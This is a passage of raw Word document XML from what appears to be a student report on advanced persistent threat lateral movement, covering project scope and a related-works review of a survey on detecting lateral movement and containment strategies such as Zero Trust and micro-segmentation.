      <w:r w:rsidR="004F0733" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reconnaissance</w:t>
      </w:r>
      <w:r w:rsidR="003E2E3F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> as it's another way to discover further information</w:t>
      </w:r>
      <w:r w:rsidR="006567D7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> that was not accessible from </w:t>
      </w:r>
      <w:r w:rsidR="000F379A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">external </w:t>
      </w:r>
      <w:r w:rsidR="004F0733" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>reconnaissance</w:t>
      </w:r>
      <w:r w:rsidR="000F379A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="004F0733" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to establish</w:t>
      </w:r>
      <w:r w:rsidR="000F379A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the initial compromise. </w:t>
      </w:r>
      <w:r w:rsidR="00DF6BC7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Overall, a</w:t>
      </w:r>
      <w:r w:rsidR="009B6615" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ddressing the risk of </w:t>
      </w:r>
      <w:r w:rsidR="00DF6BC7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidR="009B6615" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ateral </w:t>
      </w:r>
      <w:r w:rsidR="00DF6BC7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>m</w:t>
      </w:r>
      <w:r w:rsidR="009B6615" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">ovement within network security </w:t>
      </w:r>
      <w:r w:rsidR="007D2D44" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">emphasizes </w:t>
      </w:r>
      <w:r w:rsidR="007914A2" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">critical </w:t>
      </w:r>
      <w:r w:rsidR="00AE7284" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>network vulnerabilities. It should be noted that due to time and hardware constraints, this project will not be simulating an entire Extended Detection and Response (X</w:t>
      </w:r>
      <w:r w:rsidR="00B60942" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">DR) </w:t>
      </w:r>
      <w:r w:rsidR="006C1D6D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>kill chain to address all of what APT does</w:t>
      </w:r>
      <w:r w:rsidR="007300BF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and will not involve using CPS</w:t>
      </w:r>
      <w:r w:rsidR="005A7AA7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – this will be for future explorations as students.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="179EA777" w14:textId="1029C4F1" w:rsidR="009303D9" w:rsidRPr="00FF6966" w:rsidRDefault="00363CED" w:rsidP="006B6B66">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Related Works</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C1569F1" w14:textId="4C722003" w:rsidR="00433686" w:rsidRPr="00FF6966" w:rsidRDefault="00AB41BD" w:rsidP="00E5298C">
      <w:pPr>
        <w:ind w:firstLine="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The following section will </w:t>
      </w:r>
      <w:r w:rsidR="00EF61BF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>introduc</w:t>
      </w:r>
      <w:r w:rsidR="00247485" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">e </w:t>
      </w:r>
      <w:r w:rsidR="00420E50" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">major works </w:t>
      </w:r>
      <w:r w:rsidR="00EF61BF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>that we</w:t>
      </w:r>
      <w:r w:rsidR="00404116" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF61BF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">learned from </w:t>
      </w:r>
      <w:r w:rsidR="00C51B3B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and are related </w:t>
      </w:r>
      <w:r w:rsidR="003B1ED0" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">to our goal of understanding </w:t>
      </w:r>
      <w:r w:rsidR="00893881" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>APT lateral movement</w:t>
      </w:r>
      <w:r w:rsidR="001F61A9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and ultimately </w:t>
      </w:r>
      <w:r w:rsidR="000539A9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heading</w:t>
      </w:r>
      <w:r w:rsidR="00CF6D29" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> towards the direction of </w:t>
      </w:r>
      <w:r w:rsidR="00416E8D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>generating a practical solution</w:t>
      </w:r>
      <w:r w:rsidR="00523726" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> – the theoretical explorations before </w:t>
      </w:r>
      <w:r w:rsidR="00012967" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>heading into simulating</w:t>
      </w:r>
      <w:r w:rsidR="002F1FC8" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00893881" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EF61BF" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C77B605" w14:textId="275142C4" w:rsidR="002F1FC8" w:rsidRPr="00FF6966" w:rsidRDefault="00765BB2" w:rsidP="00E5298C">
      <w:pPr>
        <w:ind w:firstLine="288"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Prior work </w:t>
      </w:r>
      <w:r w:rsidR="005275DC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">seen primarily delves into </w:t>
      </w:r>
      <w:r w:rsidR="00EF5577" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">what APT is, </w:t>
      </w:r>
      <w:r w:rsidR="004F4267" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">what lateral movement is, their challenges, </w:t>
      </w:r>
      <w:r w:rsidR="004C6A60" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">and strategies. </w:t>
      </w:r>
      <w:r w:rsidR="00B600BE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Common</w:t>
      </w:r>
      <w:r w:rsidR="00CF2F26" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> strategies </w:t>
      </w:r>
      <w:r w:rsidR="000539A9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>are</w:t>
      </w:r>
      <w:r w:rsidR="00CF2F26" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A829DD" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">detecting lateral movement activity </w:t>
      </w:r>
      <w:r w:rsidR="007C7508" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidR="00EF41B1" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">via </w:t>
      </w:r>
      <w:r w:rsidR="007C7508" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">machine learning, neural networks, </w:t>
      </w:r>
      <w:r w:rsidR="00FB611B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>native OS</w:t>
      </w:r>
      <w:r w:rsidR="000539A9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00FB611B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and network logging techniques</w:t>
      </w:r>
      <w:r w:rsidR="007C7508" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">…), </w:t>
      </w:r>
      <w:r w:rsidR="00970582" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">forensic analysis, </w:t>
      </w:r>
      <w:r w:rsidR="00BE1023" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>improving</w:t>
      </w:r>
      <w:r w:rsidR="00882A4F" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00732444" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">network </w:t>
      </w:r>
      <w:r w:rsidR="0084594C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>security practices/policies</w:t>
      </w:r>
      <w:r w:rsidR="00B600BE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="008C7A0D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">dynamic game detection, </w:t>
      </w:r>
      <w:r w:rsidR="00846342" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>and deep learning.</w:t>
      </w:r>
      <w:r w:rsidR="00AC7E07" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00FC3666" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">As for containment </w:t>
      </w:r>
      <w:r w:rsidR="00814E37" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">after </w:t>
      </w:r>
      <w:r w:rsidR="000539A9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="00814E37" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">initial compromise, </w:t>
      </w:r>
      <w:r w:rsidR="0074556C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">it would follow successful detection. Containment strategies include </w:t>
      </w:r>
      <w:r w:rsidR="000539A9" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>micro-segmentation</w:t>
      </w:r>
      <w:r w:rsidR="0074556C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> of the network, </w:t>
      </w:r>
      <w:r w:rsidR="00F16E7E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Zero Trust, </w:t>
      </w:r>
      <w:r w:rsidR="00A90049" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Privileged</w:t>
      </w:r>
      <w:r w:rsidR="00CE7386" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> Access Management (PAM), and </w:t>
      </w:r>
      <w:r w:rsidR="00AD3950" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Automated Response Systems (</w:t>
      </w:r>
      <w:r w:rsidR="00A90049" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">SOAR). </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C8E200F" w14:textId="14395808" w:rsidR="00433686" w:rsidRPr="00FF6966" w:rsidRDefault="00A9204A" w:rsidP="00433686">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Detecting Lateral Movement: A Systematic Survey</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12E75EE3" w14:textId="053E1485" w:rsidR="00670E79" w:rsidRPr="00FF6966" w:rsidRDefault="00900607" w:rsidP="003C07CC">
      <w:pPr>
        <w:ind w:firstLine="288"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Th</w:t>
      </w:r>
      <w:r w:rsidR="003C07CC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>is</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> first article</w:t>
      </w:r>
      <w:r w:rsidR="003A24AA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:vertAlign w:val="subscript"/>
        </w:rPr>
        <w:t>[1]</w:t>
      </w:r>
      <w:r w:rsidR="003C07CC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, by </w:t>
      </w:r>
      <w:r w:rsidR="0054769A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Christos Smiliotopoulos, Georgios Kambourakis, and Constaninos Kolias (a current faculty member at </w:t>
      </w:r>
      <w:r w:rsidR="000F509C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="0054769A" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>University of Idaho)</w:t>
      </w:r>
      <w:r w:rsidR="00FE7958" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> explains the systematic survey on detecting lateral movement</w:t>
      </w:r>
      <w:r w:rsidR="00E33C01" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">provides a comprehensive </w:t>
      </w:r>
      <w:r w:rsidR="003C07CC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>overview of APTs</w:t>
      </w:r>
      <w:r w:rsidR="00E33C01" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (it was usefu</w:t>
      </w:r>
      <w:r w:rsidR="006D373B" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>l for understanding what the kill chain was)</w:t>
      </w:r>
      <w:r w:rsidR="003C07CC" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">. Spanning </w:t>
      </w:r>
      <w:r w:rsidR="000F509C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>eight years (2015-2023) and analyzing 53 articles, the study ca</w:t>
      </w:r>
      <w:r w:rsidR="00A05EA0" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>tegorizes research into three focus areas: Endpoint Detection and Response</w:t>
      </w:r>
      <w:r w:rsidR="008D73D2" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> (EDR) schemes, machine learning-oriented solutions, and gr</w:t>
      </w:r>
      <w:r w:rsidR="00AE695D" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>aph-based strategies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="079BA5F7" w14:textId="4CB635E3" w:rsidR="00670E79" w:rsidRPr="00FF6966" w:rsidRDefault="00AE695D" w:rsidP="003C07CC">
      <w:pPr>
        <w:ind w:firstLine="288"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidR="00F8116C" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">professors begin by defining lateral movement within the context of the cyber kill chain and MITRE ATT&amp;CK frameworks, emphasizing its role in allowing adversaries to progressively move deeper into a system in search of </w:t>
      </w:r>
      <w:r w:rsidR="005E2EDA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>High</w:t>
      </w:r>
      <w:r w:rsidR="004F0733" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="005E2EDA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Value Assets, or High</w:t>
      </w:r>
      <w:r w:rsidR="004F0733" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="005E2EDA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Value Targe</w:t>
      </w:r>
      <w:r w:rsidR="00F07290" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:r w:rsidR="005E2EDA" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>s (HVTs)</w:t>
      </w:r>
      <w:r w:rsidR="007E36CE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidR="00731E87" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> They </w:t>
      </w:r>
      <w:r w:rsidR="00761FF7" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">highlight the increasing importance of </w:t>
      </w:r>
      <w:r w:rsidR="005C712E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">lateral movement in the </w:t>
      </w:r>
      <w:r w:rsidR="00723DBE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>era of</w:t>
      </w:r>
      <w:r w:rsidR="005C712E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00723DBE" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">the </w:t>
      </w:r>
      <w:r w:rsidR="005C712E" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Internet of Things (IoT), where </w:t>
      </w:r>
      <w:r w:rsidR="00BC4C26" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>vulnerable IoT devices can serve as attractive attack vectors due to their often</w:t>
      </w:r>
      <w:r w:rsidR="00951345" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidR="00BC4C26" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">inadequate security measures and ubiquitous presence in sensitive network areas. The survey provides a detailed </w:t>
      </w:r>
      <w:r w:rsidR="006C0977" w:rsidRPr="00FF6966">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>examination of various methodologies and techniques used to detect and mitigate lateral movement attacks. For EDR schemes, the authors focus on event-oriented reconnaissance of lateral movement practices, including the gathering of system and network-related logs, implementation of EDR rules, and evaluation of success rates. They chronologically analyze different studies, summarizing key characteristics and benchmark datasets used in each case. Machine learning-oriented solutions are explored within the article, showcasing how AI techniques are being applied to improve the detection and classification of lateral movement incidents.</w:t>
      </w:r>
    </w:p>
